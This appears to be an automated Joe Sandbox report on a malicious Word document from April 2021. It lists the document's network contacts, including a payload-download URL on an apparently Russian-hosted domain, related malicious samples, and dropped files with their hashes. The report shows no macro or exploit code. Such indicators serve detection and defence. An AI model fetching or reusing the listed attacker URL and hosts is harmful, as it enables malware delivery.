                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                          high
                                                                          http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4vbaProject.binfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                high
                                                                                                https://api.office.netA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                45.142.215.160
                                                                                                                                                better-transport-2008.comRussian Federation
                                                                                                                                                202933CLOUDSOLUTIONSRUfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:399362
                                                                                                                                                Start date:28.04.2021
                                                                                                                                                Start time:17:52:54
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 4m 48s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Datei-04.28.2021.doc
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:31
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal76.expl.winDOC@4/14@1/1
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .doc
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 93.184.220.29, 13.64.90.137, 131.253.33.200, 13.107.22.200, 20.50.102.62, 13.88.21.125, 92.122.145.220, 52.109.76.68, 52.109.76.35, 52.109.76.34, 52.147.198.201, 184.30.24.56, 20.82.209.183, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129
                                                                                                                                                • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                45.142.215.160Datei-04.28.2021.docGet hashmaliciousBrowse

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  CLOUDSOLUTIONSRUDatei-04.28.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.160
                                                                                                                                                  richiedere-04.26.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.164
                                                                                                                                                  richiedere-04.26.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.164
                                                                                                                                                  richiedere-04.26.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.164
                                                                                                                                                  verschreiben.04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.163
                                                                                                                                                  verschreiben.04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.163
                                                                                                                                                  verschreiben.04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.163
                                                                                                                                                  3IsEcDekqj.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.63
                                                                                                                                                  Handel-04.20.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  Handel-04.20.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  der Vorschlag.04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  der Vorschlag.04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  der Vorschlag.04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.16
                                                                                                                                                  zu erzaehlen.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  zu erzaehlen.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  zu erzaehlen.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  verschreiben 04.16.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  verschreiben 04.16.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  verschreiben 04.16.2021.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.215.32
                                                                                                                                                  zu fordern.04.21.docGet hashmaliciousBrowse
                                                                                                                                                  • 45.142.213.182

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\ProgramData\argumentSelectTmp.jpg
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):204
                                                                                                                                                  Entropy (8bit):5.134216527532146
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                                                                                                                                                  MD5:FEDDB78986726A4A2161D362A5D52F25
                                                                                                                                                  SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                                                                                                                                                  SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                                                                                                                                                  SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\A87B51A9-A3C7-4F56-B132-575A1B8D2861
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):134558
                                                                                                                                                  Entropy (8bit):5.368408674816341
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:xcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:OEQ9DQW+zPXO8
                                                                                                                                                  MD5:311806B4B6FD76169530A0D8AA27F87A
                                                                                                                                                  SHA1:7E03FA01F7C5FB2237868BBBA80BF5DB58D5428E
                                                                                                                                                  SHA-256:04011A3382253AC5B3BB0584F414B114C33CAFCF7F7C9065BF2C3BBCDFFE24F8
                                                                                                                                                  SHA-512:9902ED4949C849E9A4D58DBDFD09597DB921DC1901B3A88AD1E23B9406791C2967578CF31F3326EF1B9871209ECB8FB5856EB2D7390DF12DCACD0B21BDC48133
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-28T15:53:39">.. Build: 16.0.14026.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\547D46CD.jpeg
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:[TIFF image data, little-endian, direntries=14, height=630, bps=182, compression=LZW, PhotometricIntepretation=RGB, orientation=upper-left, width=2288], baseline, precision 8, 828x186, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):79188
                                                                                                                                                  Entropy (8bit):7.847381222647767
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:3hdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6eh:MlZAPY2yWwb3ZadaxHeuNQpeh
                                                                                                                                                  MD5:A1BAC07A20C5DF390D6D96B0FB713F5D
                                                                                                                                                  SHA1:427F044786B5C412EF3B424CDA2DEA817AA9CCA6
                                                                                                                                                  SHA-256:0638205EBB792E3447169B46FBFB6BC48A1433B8335794ED4CEB6706F5290EF3
                                                                                                                                                  SHA-512:1EBB00551E59417AA5CC16D195E27EE227342108C4C093D9A747241BAC6AC54A48262686AD3911DFDCF89AA1EA3E2A1C91CAE790252A5C2C81978F362CCA2BA1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .....xExif..II*...........................v...................................................................................................(...........1...........2...........i...........0................'.......'..Adobe Photoshop 22.2 (Windows).2021:04:08 01:34:08..........................<...........................................~...............(.......................................H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................$...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......S.,.2....}....sC.:.....k..}OS.6~..?Yz.......}M...|....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmp
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:Microsoft Word 2007+
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17942
                                                                                                                                                  Entropy (8bit):7.402079594689573
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:Jg+SiC78IKpodS2kC556akwLWdxd0pfB3lXMUES7ls:cV8xo5krakw6L0pfLMRgs
                                                                                                                                                  MD5:750EA3694D64FBF745FF350EEDF81300
                                                                                                                                                  SHA1:333AD1C748B5AF88F2296347D9161072F3B0FFDD
                                                                                                                                                  SHA-256:ADDFC062C6618726504DCD124B5A4EAEFC38FB2E72A7CC9076354C0A5A719A94
                                                                                                                                                  SHA-512:1FFBEB0C5407341E9302673050D8D3562CB05EA0EFDE0FE36745F56A0FD49AD0EB5E6EF295FD3D6A0DAABBAFC47E217982B61F6D1581732C3C581E931DC1F919
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9CE060EB-57B2-4D10-B350-6C5157BDAA6D}.tmp
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1536
                                                                                                                                                  Entropy (8bit):0.1903644670878318
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:/lMlt4slllFlNtwl5h9Z9:+lr45v
                                                                                                                                                  MD5:43EADFFEFD5914B486C8193474EA3408
                                                                                                                                                  SHA1:048972F9F902493E595F848E45052DF938621907
                                                                                                                                                  SHA-256:46F3BCD8D35DE83BDD29CA5C831E78C421869E3D4D0F8DDD60CD2A9E8E60ED77
                                                                                                                                                  SHA-512:11BBE96AFE28472C497DC7252560D77B9595C904C2253881AC407DFD5F23A3D4EA29526DB4DCA242B074D83217459D10FB428ACF92B934C17C286E73A87A3338
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{CBEA3AE0-72F5-4309-8667-0310211F1AE9}.tmp
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1024
                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{CD582963-AB60-4B3D-8985-14AC1ED35740}.tmp
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1024
                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\laka4[1].htm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):204
                                                                                                                                                  Entropy (8bit):5.134216527532146
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                                                                                                                                                  MD5:FEDDB78986726A4A2161D362A5D52F25
                                                                                                                                                  SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                                                                                                                                                  SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                                                                                                                                                  SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                                                                                                                                                  Malicious:false
                                                                                                                                                  IE Cache URL:http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs
                                                                                                                                                  Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):170164
                                                                                                                                                  Entropy (8bit):4.363515954994734
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:fJNoRXaLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:ffoog8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                  MD5:2EF82388B599F560F5A36C3E7B2C0D9E
                                                                                                                                                  SHA1:717942BFB7DD27FD8ABC76E81B01716BE4FF5090
                                                                                                                                                  SHA-256:759C5E3596DF80EA4C95D00BD7D93EE18D676CF24E8BE74CFF95417B06958E68
                                                                                                                                                  SHA-512:590A751D31912A0D6B700812A2A0D471D99DE8DDC979388CABFD3CE0345BBEF34763CB9341EA2AA0D2FD3FF0086B27904D1C2720BE173AB84B2539DB56CAF62C
                                                                                                                                                  Malicious:false
